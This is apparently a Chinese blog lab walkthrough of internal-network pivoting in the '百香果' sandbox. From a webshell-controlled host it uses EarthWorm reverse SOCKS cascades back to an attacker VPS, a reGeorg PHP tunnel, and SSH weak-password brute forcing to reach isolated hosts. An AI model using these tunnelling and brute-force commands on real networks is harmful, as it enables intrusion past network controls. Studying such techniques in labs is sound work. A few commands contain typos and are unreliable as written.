基于百香果内网安全沙盘的SOCKS学习·下篇

0x01 前言

     上周斗哥给大家介绍了在“百香果”内网安全沙盘中SOCKS的4款工具的基本使用，模拟了在实战情况下Socks工具的使用，掌握在通信隧道中基本的网络结构，本期将继续给大家带来内网通信隧道中SOCKS代理更为复杂的实战环境的模拟。

0x02 实战场景

实战环境模拟真实复杂的网络环境，包括ew的多级级联场景和内网服务器限制主动出网场景。

一、EarthWorm 一级级联和二级级联场景

1. 拓扑变更

2. 网络说明

A 映射80 端口到FW3的80。

A对外NAT能够访问到Z。

A能访问B但是不能访问C，而B能访问到C。

但是B和C都不能出网访问Z。

FW3 上的ACL配置规则：

3. 场景任务

Z能够通过WEBShell控制A，经过扫描获得B的SSH弱口令，需要通过EW工具的二级级联在Z上访问到C的WEB服务。

4. 任务配置 1> 先配置1级级联 VPS配置：ew -s rcsocks -l 1008 -e 888

A -> webshell：ew -s rssocks -d 66.28.6.110 -e 888

VPS 配置Goby：

通过Goby扫描出SSH服务，但是却没有扫出弱口令：

通过配置Proxifier结合超级弱口令工具：

打开超级弱口令检查工具，输入IP地址导入字典：

配置FinalShell 的SSH连接和代理：

配置代理服务器：

2> 配置2级级联

通过Goby的网段探测，并未发现10.10.16.111这个网络：

但是查看10.10.16.110的arp 却发现了这个存活地址，说明10.10.16.110的网络边界比10.10.13.110来得多：

目前的代理无法访问这个地址：

我们需要通过二级级联来借助10.10.16.110获得更多的网络信息。

利用FinalShell可以很容易上传文件：

VPS配置：ew -s lcx_listen -l 1080 -e 8888

A配置： w -s lcx_slave -d 66.28.6.110 -e 8888 -f 10.10.16.110 -g 9999

B配置：./ew_for_linux -s ssocksd -l 9999

此时代理本地的SOCKS://127.0.0.1:1080可以成功访问到10.10.16.111：

二、内网服务器A限制主动出网

1. 拓扑变更

2. 网络说明 A 映射80 端口到FW3的80。 A对外NAT限制访问。 A能访问B但是不能访问C，而B能访问到C。 但是B和C都不能出网访问Z。 FW3 上的ACL配置规则：

3. 场景任务 Z能够通过WEBShell控制A，经过扫描获得B的SSH弱口令，需要通过EW工具的二级级联在Z上访问到C的WEB服务。

4. 任务配置 此时通过ew 无法建立通信隧道：

VPS配置：上传tunnel.nosocket.php文件

python reGeorgSocksProxy.py -p 1080 -u http://66.28.7.2/tunnel.nosocket.php

扫出22端口：

成功爆破出SSH账号：

连接的时候却出错了：

不过finalshell 无法打开。

经过各种尝试后，换Xshell 客户端进行连接：

./ew_for_linux lcx_tran 8888 10.10.16.111 -g 80

成功实现站点访问。

0x03 总结

本期基于“百香果”内网沙场的SOCKS学习·下篇就到这里了，下面斗哥还会代理内网隧道通信中关于DNS隧道、ICMP隧道、SSH隧道等其他系列的文章，敬请期待吧。